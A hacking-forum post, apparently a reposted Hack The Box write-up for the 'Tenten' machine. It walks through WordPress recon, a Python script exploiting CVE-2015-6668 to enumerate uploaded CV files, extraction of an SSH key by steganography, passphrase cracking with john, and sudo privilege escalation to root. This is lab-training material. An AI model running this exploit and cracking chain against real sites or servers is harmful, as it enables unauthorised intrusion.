Jump to content

Title: Hack The Box —— Tenten

UKhackteam
UKhackteam
in Hacker Cracking / Penetration Testing / Cybersecurity

Featured Replies

Posted

Hack The Box —— Tenten

20190905155646.png-water_print

信息搜集

nmap

1

nmap -T4 -A -v 10.10.10.6

I found that the server opened a 22-port and 80-port browser to access the http service and found the wordpress site.

漏洞扫描

Use the wpscan tool to scan the information of a wave of wordpress website:

1

wpscan --enumerate t --enumerate p --enumerate u --url=http://10.10.10.10/

Discover username:

20190905160043.png-water_print

Plugin vulnerability:

20190905160104.png-water_print

漏洞利用

Search for Job-Manager-related vulnerabilities and found that users can use this plug-in to upload CVs. Since the file uploaded by wordpress is stored in upload/year/month/filename, the uploaded CV file can be blasted, causing information leakage.

First visit Jobs Listing:

20190905161223.png-water_print

Get job details under apply now:

20190905161402.png-water_print

20190905161501.png-water_print

Change the number value in the url to get other JOB APPLICATION.

Use the following command to enumerate the job title:

20190905161711.png-water_print

Discover HackerAccessGranted title, try to use exp to upload cv enumeration of user upload:

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

twenty one

twenty two

twenty three

import requests

print '''

CVE-2015-6668

Title: CV filename disclosure on Job-Manager WP Plugin

Author: Evangelos Mourikis

Blog: https://vagmour.eu

Plugin URL: http://www.wp-jobmanager.com

Versions:=0.7.25

'''

website=raw_input('Enter a vulnerable website: ')

filename=raw_input('Enter a file name: ')

filename2=filename.replace(' ', '-')

for year in range(2016, 2019):

for i in range(1,13):

for extension in {'php','html','pdf','png','gif','jpg','jpeg'}:

URL=website + '/wp-content/uploads/' + str(year) + '/' + '{:02}'.format(i) + '/' + filename2 + '.' + extension

print URL

req=requests.get(URL)

if req.status_code==200:

print '[+] URL of CV found! ' + URL

20190905161950.png-water_print

The following sensitive files were found:

20190905162035.png-water_print

Visit and get a picture.

20190905162105.jpg-water_print

To guess the image steganography, use steghide extract -sf HackerAccessGranted.jpg to get the id_rsa file.

20190905162242.png-water_print

20190905162345.png-water_print

Open the id_rsa file and find that the file is encrypted:

20190905162314.png-water_print

Use the ssh2john script file to convert encrypted content into files that john can crack

1

python2 ssh2john id_rsa ssh_login

get:

20190905162833.png-water_print

Password cracking using john:

1

john ssh_login --wordlist=rockyou.txt

Get the password of id_rsa: superpassword.

Try to log in to the server:

1

ssh -i id_rsa [email protected]

20190905163056.png-water_print

Get the first flag.

Try to enter the root directory and find that the permissions are insufficient.

Use the sudo -l command to view commands that do not require password:

20190905163351.png-water_print

Discover the /bin/fuckin file and view the file content:

20190905163512.png-water_print

Execute: sudo /bin/fuckin /bin/bash to obtain root permissions:

20190905163635.png-water_print

  • Quote

    • Join the conversation

    You can post now and register later. If you have an account, sign in now to post with your account.
    Note: Your post will require moderator approval before it will be visible.

    Guest
    Reply to this topic...
    Go to topic listing

    Important Information

    HackTeam Cookie PolicyWe have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.